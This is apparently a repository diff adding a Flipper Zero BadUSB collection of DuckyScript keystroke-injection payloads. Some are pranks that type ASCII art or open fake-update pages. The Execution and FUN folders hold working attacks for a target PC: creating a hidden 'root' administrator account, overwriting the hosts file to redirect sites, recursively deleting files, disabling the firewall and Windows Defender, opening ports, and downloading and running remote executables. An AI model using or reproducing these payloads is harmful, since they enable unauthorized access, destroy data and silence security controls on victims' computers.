🤬
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■ ■ ■
    FlipperZero_BadUSB_Collection/ASCII_Notepad/Hacked.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Opens Notepad and types out the ASCII art
     3 +REM Version: 1.0
     4 +REM Category: ASCII
     5 +DELAY 1000
     6 +GUI r
     7 +DELAY 500
     8 +STRING notepad
     9 +ENTER
     10 +DELAY 1000
     11 +GUI UPARROW
     12 +DELAY 500
     13 +STRING #@@@@@@@/
     14 +ENTER
     15 +STRING @@@@@@@@@@@@@@@@@@@
     16 +ENTER
     17 +STRING @@@@@@@@@@@@@@@@@@@@@@@@@
     18 +ENTER
     19 +STRING .@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
     20 +ENTER
     21 +STRING &@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%
     22 +ENTER
     23 +STRING &@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#
     24 +ENTER
     25 +STRING @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
     26 +ENTER
     27 +STRING (@@@@@@@@@@@@@@@@@@@@@@@@@. (@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@* .@@@@@@@@@@@@@@@@@@@@@@@@@&
     28 +ENTER
     29 +STRING (@@@@@@@@@@@@@@@@@@@@@@@@@, (@@@@@ #@@@, .@@@@@, ,@@@@@@@@@@@@@@@@@@@@@@@@@&
     30 +ENTER
     31 +STRING (@@@@@@ @@@@# @@@ &@@@@ %@@@@@&
     32 +ENTER
     33 +STRING (@@@@@@ @@@@. &@@@# *@@@@ %@@@@@&
     34 +ENTER
     35 +STRING (@@@@@@ (@@@@@* %@@@@@@@@@( /@@@@@, %@@@@@&
     36 +ENTER
     37 +STRING (@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@ %@@@@@&
     38 +ENTER
     39 +STRING (@@@@@@ #@@@@ (@@@@@@ @@& ,@@@@@@* .@@@@/ %@@@@@&
     40 +ENTER
     41 +STRING (@@@@@@ @@@@@@/ (@@@@@@@@@@@@@@@@@@@* %@@@@@@ %@@@@@&
     42 +ENTER
     43 +STRING (@@@@@@ (@@@@@@@@@@% ,@@ @@@@@@.@@@@@,(@@ &@@@@@@@@@@, %@@@@@&
     44 +ENTER
     45 +STRING (@@@@@@ .@@@@@@@@@@@@@@& #@@@@@ @@@@@ .@@@@@@@@@@@@@@@ %@@@@@&
     46 +ENTER
     47 +STRING (@@@@@@ *@@@@@@@@@@, *@@@@@@@@@@* %@@@@@&
     48 +ENTER
     49 +STRING (@@@@@@ .&@@@@@@@@@( #@@@@@@@@@% %@@@@@&
     50 +ENTER
     51 +STRING (@@@@@@ %@@@@@@@@@@@@@@@@@( %@@@@@&
     52 +ENTER
     53 +STRING (@@@@@@ .@@@@@@@@@@@ %@@@@@&
     54 +ENTER
     55 +STRING (@@@@@@ /@@@@@@@@@@@@@@@@@@@@@@@@@@@@@. %@@@@@&
     56 +ENTER
     57 +STRING (@@@@@@ @@@@@@@@@@@@ &@@@@@@@@@@@ %@@@@@&
     58 +ENTER
     59 +STRING (@@@@@@ &@@@@@@ . .@@@@@@% %@@@@@&
     60 +ENTER
     61 +STRING (@@@@@@ *@@@@& @@@@@. %@@@@@&
     62 +ENTER
     63 +STRING (@@@@@@ %@@@@@&
     64 +ENTER
     65 +STRING (@@@@@@ %@@@@@&
     66 +ENTER
     67 +STRING (@@@@@@ %@@@@@&
     68 +ENTER
     69 +STRING (@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&
     70 +ENTER
     71 +STRING (@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&
     72 +ENTER
     73 +ENTER
     74 +STRING @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#
     75 +ENTER
     76 +STRING /@@@@@, *@@@@ .@@@@. @@@@ ,@@@@ .@@@@ ,@@@@ *@@@@ ,@@@@. /@@@@&
     77 +ENTER
     78 +STRING @@@@@@ .,@@@@, .@@@@@ ,@@@@* @@@@@ .@@@@& %@@@@ @@@@@.. @@@@@@
     79 +ENTER
     80 +STRING &@@@@@% .@@@@% .@@@@% @@@@@ @@@@@ @@@@@ @@@@@* @@@@@ &@@@@@(
     81 +ENTER
     82 +STRING *@@@@@@. ,@@@@@ %@@@@( @@@@@ (@@@@@ @@@@@, ,@@@@@ &@@@@% .@@@@@ *@@@@@@
     83 +ENTER
     84 +STRING @@@@@@@ @@@@@ @@@@@ @@@@@ @@@@@# @@@@@% #@@@@@ *@@@@@ .@@@@@ .@@@@@@&
     85 +ENTER
     86 +STRING (@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*
     87 +ENTER
     88 +STRING @@@@@@@, .@@@@@, @@@@@# @@@@@@ %@@@@@ /@@@@@@@
     89 +ENTER
     90 +STRING %@@@@@@@ .@@@@@% .@@@@@( &@@@@@. @@@@@@ @@@@@@@/
     91 +ENTER
     92 +STRING @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
     93 +ENTER
     94 +STRING @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
     95 +ENTER
     96 +STRING @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
     97 +ENTER
     98 +ENTER
     99 +STRING ##### # # # ##### # # ####### ######
     100 +ENTER
     101 +STRING # # #### ##### ##### # # ##### # # ##### # # #### # # # # ## # # ###### ##### ###### ###### # # # # # # # # # # # # #
     102 +ENTER
     103 +STRING # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ## # # # # # # # # # # #
     104 +ENTER
     105 +STRING ##### # # # # # # # ##### # # # # # # # # ###### # # # # ##### ##### ##### ##### # # # ####### # # # ### ##### # #
     106 +ENTER
     107 +STRING # # # ##### ##### # ### # # # # # # # # # # # # ###### # # # # # # # # # # # # ####### # # # # # #
     108 +ENTER
     109 +STRING # # # # # # # # # ### # # # # # # # # # # # # # # # # # # # # # # ## # # # # # # # # # # #
     110 +ENTER
     111 +STRING ##### #### # # # # # # ##### #### # # #### #### # # # # ## ###### ##### ###### ###### # # # # # # ##### # # ####### ######
     112 +ENTER
     113 +DELAY 2000
     114 +CTRL HOME
     115 +DELAY 2000
     116 +CTRL END
  • ■ ■ ■ ■ ■ ■
    FlipperZero_BadUSB_Collection/ASCII_Notepad/RickRoll.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Opens Notepad and types out the ASCII art
     3 +REM Version: 1.0
     4 +REM Category: ASCII
     5 +DELAY 1200
     6 +GUI r
     7 +DELAY 600
     8 +STRING notepad
     9 +ENTER
     10 +DELAY 750
     11 +GUI UPARROW
     12 +DELAY 500
     13 +STRING K00KKKKKKKKOOOOOOOOOOO0KKKKXKK00O000OOOOOOkkkkOO0KKKKKKXKKKKXKKKKK0OkxxkxxxxxxkO000KKKKKKKK000000000
     14 +ENTER
     15 +STRING 0000OO0O0OOOO000OO0000KKKK000OkkkkkkkkxxxxkkkkxkkkkkkOO00OOO00KKKKK0OkxxxxxxxxxkO00KKKKKKKKKK0000000
     16 +ENTER
     17 +STRING KKK0000OOOOOO0000000000OOOkkkkkOOOOkkkkkkxoolcclc:;;:clodkOOkkOOOOOOOkxxxxxkkkxxkkOOO000O00000000000
     18 +ENTER
     19 +STRING XXXXXXXKKKKK00000000000000OOkOOOOOkkkkkOOo:,'',,,,,,,',,:ldkkkkkkxxxxxxxxxkkkkxxkxxkkOOOO00KKKXK00KK
     20 +ENTER
     21 +STRING XXXXXXXXXNNXXK00000000KKXKKK00OOkkkOkkkkdl;,'.'..''''''',;;lxOkOOOkkkkxxkkkkkkkkkkkO0KKKKKXNNNNXK0KX
     22 +ENTER
     23 +STRING XXXXXXXNNNNXKK000000000KXXXXKKKOOOO0OOOkoc:;;;,,',,,,,,,,,,;lO00K000OkkkkkkkkO00KKKKXKXXXXXNNNNNX00K
     24 +ENTER
     25 +STRING XNNXXXXXKKKK00000000KK00KKKKK000OOO00kdloolooodoooddddool;,,cOKK000OkkkkkkkkkkO0KKKKXXXXXXXXNNNNK000
     26 +ENTER
     27 +STRING XXXXKK000000KXK0000KKK0000OOOOOOOkkkkd:codlloddddxxxxxxxxl;,lkOOkkkkkkkkxkkkkkkOO000KKKXXXXXNNNNXK00
     28 +ENTER
     29 +STRING K0K0000000KXXXK00000KXK0000000000Okkkdcldolccloddddxxxkxxo:;lkkkkxxxk00kxkkkkkkkkkkkk00KXKXXXNNNNNXK
     30 +ENTER
     31 +STRING 000000000XXNNX000000K0000KXXXXXXXK0Okkdddl::::codolllodddo::x0OkkkxxkOOkxkkkkOOOkkkkkkOO000KXNNNXXXX
     32 +ENTER
     33 +STRING KKKK0000KXNNNXKK000000KKKXNNNNXXXXX0xkOkdllccccoxxdolloodlcx0KKKKOkxxkkkkkkkkO000OkkkkkkkkOO0XXXXXXK
     34 +ENTER
     35 +STRING XXNXXKKKKXNWNXKKKKKKKXNNNNNNXXXXXXXOodOkolllllloxxxxxxxxdooOKKKKKKOOkkkkkkkkkOK000kkkkkkkkkkOO0KKXKK
     36 +ENTER
     37 +STRING XNNXXNXKKKXNNXKKKKKKKKNNNNNNXXXXXXX0xdkkollllccoddxxxxxxdddOKKKKKK0K0OkkkkkkkOKKKOkkkkO000OkkkkkO0KK
     38 +ENTER
     39 +STRING XXXXKK00KKKKKKK00K000KXNNNNNNNXXXXXK0O0kolllllodxxxxxxxddxk0KKK0KK0K0kkxxkkkkO00OkkOO000000OkkkkkkkO
     40 +ENTER
     41 +STRING KXXK000KXXXK0K000K00KXNWNNNNNNXXXXXK0KKkollcccloddddxxxkOOKK0KK0KK0K0kxxxxkkxkkkkkkkOO000K00OOkkkkkk
     42 +ENTER
     43 +STRING 00000KXNNNNNKK0000000KNNNNNNNNXXXXXK000kdollloodxxxdddx0K0KK0KK0KK0KKOkxxxxxxxxk00OkkkOKKK0OOkkOOOOO
     44 +ENTER
     45 +STRING 00000XNNNNNNXK0000000000KNNXNNXXXK0Okkkdolllclodddddddk000KK0KK0K000Okkxxxxxxkk000K0OkO000Okkkk00K0O
     46 +ENTER
     47 +STRING XXK00XNNNNNNX00000KKK0000KXXNNXXKOkkkkkdllccccclooodddxdxO0KKKKKK0OkkkkkkxxxxkO0KKKKK0OOOOOOOkkO00Ok
     48 +ENTER
     49 +STRING XNNK0KXNNNNNK00000KXNXK00OO00000Okkkkkkdllllloddddxddkx:;lx00K00OkkxkkOOkxxkkkO0KKKKK0O0KKXK0Okkkkkk
     50 +ENTER
     51 +STRING XXNK00XNNXNNK000000KK000OOOOkkkkkkOOOxooolllloodddddkOo'..';loddxxxkO00OkkkkkkO000KKKOOKXXXKK0OkkkO0
     52 +ENTER
     53 +STRING XXXX0OKXXXXXKOOOOO00OOO00KK0OOxxdxkOOxoodoollooooxxk0Oc.......'';::cllodxxkkkkO000KK0O0KXXXXK0OkkkO0
     54 +ENTER
     55 +STRING XXXXKO0KXXXX0OOOOOOOOO0KK0Oxol:;:okOOkooooolllodkO00Oo,................',;:cldO00000Ok0XXKXK0kkxkkkk
     56 +ENTER
     57 +STRING KXXXKOO00KXKOkkkkOOOOkkxoc:,'...'lkkkxlccclddxkOO00kl'.......................,oO0000kk0KKKX0kkkkkxxk
     58 +ENTER
     59 +STRING 0KK00OOOOOO0Okkkkkkdl:;,'.......'cxxddc:ccoxkOO00xo:..........................,d0OOkkk0KKK0kkxO0OOkx
     60 +ENTER
     61 +STRING OOOOO0KKK0OOOkkkkkx:.............',':lc::clolodxd:,............................lOkkkkkkO00kxkkO000Ox
     62 +ENTER
     63 +STRING kOOO0XXXXXX0OOOkkkd;................;cc::cloooll:'.............................'okOOOkxkkkxxkO0KKKOk
     64 +ENTER
     65 +STRING kkO0KXXXXNNKOOOkkko,................;cccccllllc:,...............................,dO00OkkxxxxxkkOO0Ok
     66 +ENTER
     67 +STRING kkkOKXXXXXXKOOOkkko'................;cloolccc::;................................,dOO0OOkkxxxxkkkkkkk
     68 +ENTER
     69 +STRING kkkkO0XKKXX0Okkkkko,................;cldxoc::;;'.................................cxOOOOkkkxxkO0000Ok
     70 +ENTER
     71 +STRING OkkkkOKKKXX0Okkkkxl'................;:oxxo:;;;,...................................;k0Okkkkkkkk0KKXK0
     72 +ENTER
     73 +STRING 0kkkkO0KXXX0OOkkkx:.................';lxkl;;;;,......................... .......:dxkkkOOOkk0XXXXX
     74 +ENTER
     75 +STRING 00OkkOO0KXX0OOkkkx:.................',:loc;:::'........''.............. .........':okO00OkOKXXXN
     76 +ENTER
     77 +STRING KKOkOOOOKXX0OOkkkx:..................,;::::::;.........:llolcccc:'..... .. .........;lk00OkOKXXX
     78 +ENTER
     79 +STRING OOkkO0OO0KX0OOkkkx:..... ............;:c::::;'.........:::clllllol;..... . ..........';okkk0KXX
     80 +ENTER
     81 +STRING xkkk0K0OO0KOkkkkkkl.... ............;:::;;;,..........';:cllllllol:.... ..............:xkk0KK
     82 +ENTER
     83 +STRING xkkkO0K0OOOOkkkkkko.... ...........,;;;,,,'...........';:ccllllloo:........................;xkkO0K
     84 +ENTER
     85 +STRING OO00OOOOkkkkkkkxxkc..... ..........',;;,''.............';:ccllllooc'.......................;xkxk0K
     86 +ENTER
     87 +STRING 00KKK0Okkkkkkkxxxxc..... ..........,;;,,,......... .........,;cllc,.......................'oxxxOO
     88 +ENTER
     89 +STRING 000KK0OOOkkkkkxxxd;........ .........';;,,,... ..,,'.. ......................:dxxxx
     90 +ENTER
     91 +STRING 000K0K000Okkkxxxxd:,,'...,:ccllc::;'..,;;;;,. ..,;,................:dddxx
     92 +ENTER
     93 +STRING OO00OO000Okkkxxxxxo,...,clolcc::;;,...,;;;,'. . ..................,cdddddx
     94 +ENTER
     95 +STRING O0000000Okkxxxxxdxo,..,,':l:;;;;;;,...,;;,'.. .'''........'',;:oxkxddodd
     96 +ENTER
     97 +STRING OOO0OOkkkxxxxxxxddd:''...';;;;;;;;'...,,,'.. ... .cddoollloodxxxkkkkkxdoood
     98 +ENTER
     99 +STRING OO0Okxxxxxxxxxxdddddc,....',;;,;;,. .'',,... .... .,dddxxxddddxxxxkxxdoooooo
     100 +ENTER
     101 +STRING kkkxxxxxxxxxddddddxdolc:,...',,''.. ..',,... ..'lddxxddddddxxxxxdooooooo
     102 +ENTER
     103 +STRING dddddxkkkxddddddddxkdoooc;'..... ..''.. .......cddddddddddddddddoddoooo
     104 +ENTER
     105 +STRING ooddxkkOkxdddddddxxkkxdooollc:,. .''. .........;dddddddddddddooodddoooo
     106 +ENTER
     107 +STRING oodxkkkkkxddddddddxkkkkdollool,... .''','.. .........,lddddddddddddddddddoooo
     108 +ENTER
     109 +STRING oodxkkkkkdddddddodxxxxxdollol:......,;;,,'. .........:oooddddddddoodddddoooo
     110 +ENTER
     111 +STRING ooodxxkkxddddoooodxkkxdollllc;......,;;,,'. .........,looooooooooooooddooooo
     112 +ENTER
     113 + 
  • ■ ■ ■ ■ ■ ■
    FlipperZero_BadUSB_Collection/ASCII_Notepad/SimpleTroll.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Opens Notepad and types out the ASCII art
     3 +REM Version: 1.0
     4 +REM Category: ASCII
     5 +DELAY 2000
     6 +GUI r
     7 +DELAY 500
     8 +STRING notepad
     9 +ENTER
     10 +DELAY 1000
     11 +GUI UPARROW
     12 +DELAY 500
     13 +STRING _ _ _____ _ ________ _____ ______ __ _ _ _ _ _____ ______ ________ _____ ______ _____
     14 +ENTER
     15 +STRING | | | | /\ / ____| |/ / ____| __ \ | _ \ \ / / | | | | \ | |/ ____/ __ \ \ / / ____| __ \| ____| __ \
     16 +ENTER
     17 +STRING | |__| | / \ | | | ' /| |__ | | | | | |_) \ \_/ / | | | | \| | | | | | \ \ / /| |__ | |__) | |__ | | | |
     18 +ENTER
     19 +STRING | __ | / /\ \| | | < | __| | | | | | _ < \ / | | | | . ` | | | | | |\ \/ / | __| | _ /| __| | | | |
     20 +ENTER
     21 +STRING | | | |/ ____ \ |____| . \| |____| |__| | | |_) | | | | |__| | |\ | |___| |__| | \ / | |____| | \ \| |____| |__| |
     22 +ENTER
     23 +STRING |_| |_/_/ \_\_____|_|\_\______|_____/ |____/ |_| \____/|_| \_|\_____\____/ \/ |______|_| \_\______|_____/
     24 +ENTER
     25 +DELAY 2000
     26 +CTRL HOME
     27 +DELAY 2000
     28 +CTRL END
  • ■ ■ ■ ■ ■ ■
    FlipperZero_BadUSB_Collection/Execution/Create_New_Windows_Admin.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Create a new Windows-User with Admin perms.
     3 +REM Version: 1.0
     4 +REM Category: Execution
     5 +DELAY 750
     6 +WINDOWS d
     7 +DELAY 1500
     8 +WINDOWS r
     9 +DELAY 1500
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 560
     13 +LEFTARROW
     14 +ENTER
     15 +DELAY 560
     16 +ALT y
     17 +DELAY 300
     18 +STRING Net User root toor /ADD;Net LocalGroup Administrators root /ADD;Net LocalGroup Administrator root /ADD;Net LocalGroup Administratoren root /ADD;reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList' /v root /t REG_DWORD /d 0 /f; exit
     19 +ENTER
  • ■ ■ ■ ■ ■ ■
    FlipperZero_BadUSB_Collection/Execution/DNS_Cache_Poison.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Poisons the DNS Cache. (https://www.cloudflare.com/learning/dns/dns-cache-poisoning/)
     3 +REM Version: 1.0
     4 +REM Category: Execution
     5 +DELAY 750
     6 +WINDOWS d
     7 +DELAY 750
     8 +WINDOWS r
     9 +DELAY 800
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 750
     13 +LEFTARROW
     14 +ENTER
     15 +DELAY 870
     16 +ALT y
     17 +DELAY 790
     18 +STRING $redirectionAddress="IP ADRESS HERE";$redirectedSite="URL HERE";$hosts1 = $redirectionAddress + ' ' + $redirectedSite + ([Environment]::NewLine);$hosts2 = $redirectionAddress + ' www.' + $redirectedSite;$hoststotal = $hosts1 + $hosts2;[io.file]::writealltext("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS", $hoststotal); exit
     19 +ENTER
  • ■ ■ ■ ■ ■ ■
    FlipperZero_BadUSB_Collection/Execution/Delete_System_32.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Deletes System 32...
     3 +REM Version: 1.0
     4 +REM Category: Execution
     5 +DELAY 750
     6 +GUI r
     7 +DELAY 600
     8 +STRING cmd
     9 +CTRL-SHIFT ENTER
     10 +DELAY 1500
     11 +ALT y
     12 +DELAY 800
     13 +STRING takeown /f * /r /a /d y && icacls * /inheritance:r /grant:r administrators:(F) /t & del /f /q *
     14 +ENTER
     15 + 
  • ■ ■ ■ ■ ■ ■
    FlipperZero_BadUSB_Collection/Execution/DisableFirewall.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Disables the Windows-Firewall.
     3 +REM Version: 1.0
     4 +REM Category: Execution
     5 +DELAY 750
     6 +WINDOWS d
     7 +DELAY 850
     8 +WINDOWS r
     9 +DELAY 900
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 750
     13 +LEFTARROW
     14 +ENTER
     15 +DELAY 900
     16 +ALT y
     17 +DELAY 900
     18 +STRING netsh advfirewall set allprofiles state off; exit
     19 +ENTER
  • ■ ■ ■ ■ ■ ■
    FlipperZero_BadUSB_Collection/Execution/Disable_WinDefender.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Disables Windows Defender.
     3 +REM Version: 1.0
     4 +REM Category: Execution
     5 +DELAY 1500
     6 +CTRL ESC
     7 +DELAY 750
     8 +STRING windows security
     9 +DELAY 250
     10 +ENTER
     11 +DELAY 1000
     12 +ENTER
     13 +DELAY 500
     14 +TAB
     15 +DELAY 100
     16 +TAB
     17 +DELAY 100
     18 +TAB
     19 +DELAY 100
     20 +TAB
     21 +DELAY 100
     22 +ENTER
     23 +DELAY 500
     24 +SPACE
     25 +DELAY 1000
     26 +ALT y
     27 +DELAY 1000
     28 +ALT F4
     29 +DELAY 500
     30 +GUI r
     31 +DELAY 500
     32 +STRING powershell
     33 +CTRL-SHIFT ENTER
     34 +DELAY 1000
     35 +ALT y
     36 +DELAY 1000
     37 +STRING Add-MpPreference -ExclusionPath “C:”
     38 +ENTER
     39 +DELAY 2000
     40 +STRING EXIT
     41 +ENTER
     42 + 
  • ■ ■ ■ ■ ■ ■
    FlipperZero_BadUSB_Collection/Execution/DownloadAnyEXE.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Downloads an .exe file from the URL and runs it on the target pc.
     3 +REM Version: 1.0
     4 +REM Category: Execution
     5 +DELAY 750
     6 +WINDOWS d
     7 +DELAY 950
     8 +WINDOWS r
     9 +DELAY 650
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 750
     13 +LEFTARROW
     14 +ENTER
     15 +DELAY 850
     16 +ALT y
     17 +DELAY 1200
     18 +STRING $url = "URL TO EXE"; $output = "C:\windows\41281687.exe"; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath "C:\windows\41281687.exe"; exit
     19 +ENTER
  • ■ ■ ■ ■ ■ ■
    FlipperZero_BadUSB_Collection/Execution/OpenAnyPort.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Open any TCP or UDP Port on the target PC.
     3 +REM Version: 1.0
     4 +REM Category: Execution
     5 +DELAY 750
     6 +WINDOWS d
     7 +DELAY 850
     8 +WINDOWS r
     9 +DELAY 850
     10 +STRING powershell Start-Process powershell -Verb runAs
     11 +ENTER
     12 +DELAY 800
     13 +LEFTARROW
     14 +ENTER
     15 +DELAY 900
     16 +ALT y
     17 +DELAY 900
     18 +STRING netsh advfirewall firewall add rule name=Firewall entry name dir=in action=allow protocol=TCP or UDP localport=Port Number; exit
     19 +ENTER
  • ■ ■ ■ ■ ■ ■
    FlipperZero_BadUSB_Collection/FUN/Destroy_Pc_with_tabs.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Opens a few Tabs...
     3 +REM Version: 1.0
     4 +REM Category: FUN
     5 +DELAY 1200
     6 +GUI r
     7 +DELAY 400
     8 +STRING cmd /Q /D /T:0a /F:OFF /V:OFF /K
     9 +DELAY 500
     10 +ENTER
     11 +DELAY 750
     12 +STRING DEL /Q MobileTabs.vbs
     13 +ENTER
     14 +STRING copy con MobileTabs.vbs
     15 +ENTER
     16 +STRING on error resume next
     17 +ENTER
     18 +STRING navOpenInBackgroundTab = &h1000
     19 +ENTER
     20 +STRING set oIE = CreateObject("InternetExplorer.Application")
     21 +ENTER
     22 +STRING Set args = WScript.Arguments
     23 +ENTER
     24 +STRING oIE.Navigate2 args.Item(0)
     25 +ENTER
     26 +STRING for intx = 1 to args.count
     27 +ENTER
     28 +STRING oIE.Navigate2 args.Item(intx), navOpenInBackgroundTab
     29 +ENTER
     30 +STRING next
     31 +ENTER
     32 +STRING oIE.Visible = true
     33 +ENTER
     34 +CONTROL z
     35 +ENTER
     36 +STRING MobileTabs.vbs "http://www.google.com/" "http://mwomercs.com/" "http://hak5.org/" "http://forums.hak5.org/index.php?/forum/56-usb-rubber-ducky/"
     37 +ENTER
     38 + 
  • ■ ■ ■ ■ ■ ■
    FlipperZero_BadUSB_Collection/FUN/FakeBluescreen.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Opens a Website with an fake Bluescreen and setting it to fullscreen
     3 +REM Version: 1.0
     4 +REM Category: FUN
     5 +DELAY 500
     6 +GUI r
     7 +DELAY 400
     8 +STRING cmd
     9 +ENTER
     10 +DELAY 500
     11 +STRING rundll32 url.dll,FileProtocolHandler https://fakeupdate.net/win10ue/bsod.html
     12 +ENTER
     13 +DELAY 1000
     14 +F11
     15 + 
  • ■ ■ ■ ■ ■ ■
    FlipperZero_BadUSB_Collection/FUN/FakeUpdateWindows.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Opens a Website with an fake Update and setting it to fullscreen
     3 +REM Version: 1.0
     4 +REM Category: FUN
     5 +DELAY 500
     6 +GUI r
     7 +DELAY 400
     8 +STRING cmd
     9 +ENTER
     10 +DELAY 500
     11 +STRING rundll32 url.dll,FileProtocolHandler https://fakeupdate.net/win10ue/
     12 +ENTER
     13 +DELAY 1000
     14 +F11
     15 + 
  • ■ ■ ■ ■ ■ ■
    FlipperZero_BadUSB_Collection/FUN/FakeVirus.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: Opens a Website with an fake Virus and setting it to fullscreen
     3 +REM Version: 1.0
     4 +REM Category: FUN
     5 +DELAY 500
     6 +GUI r
     7 +DELAY 400
     8 +STRING cmd
     9 +ENTER
     10 +DELAY 500
     11 +STRING rundll32 url.dll,FileProtocolHandler https://fakeupdate.net/wnc/
     12 +ENTER
     13 +DELAY 1000
     14 +F11
     15 + 
  • ■ ■ ■ ■ ■ ■
    FlipperZero_BadUSB_Collection/FUN/JustAmongUs.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: AmongUs takes over the PC!!!
     3 +REM Version: 1.0
     4 +REM Category: FUN
     5 +DELAY 500
     6 +GUI r
     7 +DELAY 500
     8 +STRING powershell Start-Process powershell -Verb runAs
     9 +CTRL-SHIFT ENTER
     10 +DELAY 1500
     11 +SHIFT TAB
     12 +DELAY 500
     13 +ENTER
     14 +DELAY 1500
     15 +STRING Add-MpPreference -ExclusionPath C:\Windows\system32
     16 +ENTER
     17 +DELAY 500
     18 +STRING $down=New-Object System.Net.WebClient;$url='https://github.com/AGO061/badusb-payloads/releases/download/SUS-R1/sus.exe';$file='sus.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit
     19 +ENTER
     20 + 
  • ■ ■ ■ ■ ■ ■
    FlipperZero_BadUSB_Collection/FUN/Matrix_Rain_CMD.txt
     1 +REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
     2 +REM Description: There'll be the matrix rain in the cmd
     3 +REM Version: 1.0
     4 +REM Category: FUN
     5 +DELAY 1000
     6 +GUI r
     7 +DELAY 100
     8 +STRING notepad
     9 +ENTER
     10 +DELAY 100
     11 +STRING @echo off
     12 +ENTER
     13 +ENTER
     14 +DELAY 100
     15 +STRING color 02
     16 +ENTER
     17 +ENTER
     18 +DELAY 100
     19 +STRING mode 1000
     20 +ENTER
     21 +ENTER
     22 +DELAY 100
     23 +STRING :matrixbynima
     24 +ENTER
     25 +ENTER
     26 +DELAY 100
     27 +STRING echo %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%
     28 +ENTER
     29 +ENTER
     30 +DELAY 100
     31 +STRING goto matrixbynima
     32 +ENTER
     33 +DELAY 100
     34 +CTRL S
     35 +DELAY 200
     36 +REM change %userprofile% to your user or the devices user that your using this on
     37 +STRING %userprofile%\Desktop\matrix.bat
     38 +ENTER
     39 +DELAY 1000
     40 +GUI r
     41 +DELAY 100
     42 +STRING cmd
     43 +ENTER
     44 +DELAY 100
     45 +STRING cd %userprofile%\Desktop\
     46 +ENTER
     47 +DELAY 50
     48 +STRING matrix.bat
     49 +ENTER
     50 +DELAY 1500
     51 +ENTER
     52 + 
  • ■ ■ ■ ■ ■ ■
    FlipperZero_BadUSB_Collection/FUN/RickRoll_IntoBSOD.txt
